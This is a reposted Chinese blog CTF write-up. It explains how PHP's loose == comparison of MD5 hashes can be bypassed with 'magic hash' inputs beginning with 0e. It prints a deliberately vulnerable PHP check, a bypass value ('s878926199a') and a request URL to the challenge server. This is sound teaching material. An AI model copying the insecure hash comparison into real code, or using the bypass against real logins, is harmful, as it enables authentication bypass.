码迷,mamicode.com
首页 > 其他好文 > 详细

md5加密相等绕过

时间:2020-05-05 17:54:06      阅读:107      评论:0      收藏:0      [点我收藏+]

标签:md5加密   解释   echo   http   logs   https   图片   image   code   

0x01

<?php
$md51 = md5(‘QNKCDZO‘);
$a = @$_GET[‘a‘];
$md52 = @md5($a);
if(isset($a)){
	if ($a != ‘QNKCDZO‘ && $md51 == $md52) {
		echo "flag{*}";
} else {
	echo "false!!!";
}}
else{
	echo "please input a";}
?>

0x02代码分析

变量a的值不等于QNKCNZO,但变量a与其值的md5值相等,输出flag

QNKCDZO加密后为0e830400451993494058024219903391
php把以0E/0e开头的哈希值解释为0
所以找到一个oe开头的哈希值绕过

s878926199a
0e545993274517709034328855841020

http://123.206.87.240:9009/13.php?a=s878926199a

技术图片

参考链接:
https://www.cnblogs.com/gaonuoqi/p/11408083.html

md5加密相等绕过

标签:md5加密   解释   echo   http   logs   https   图片   image   code   

原文地址:https://www.cnblogs.com/observering/p/12831453.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!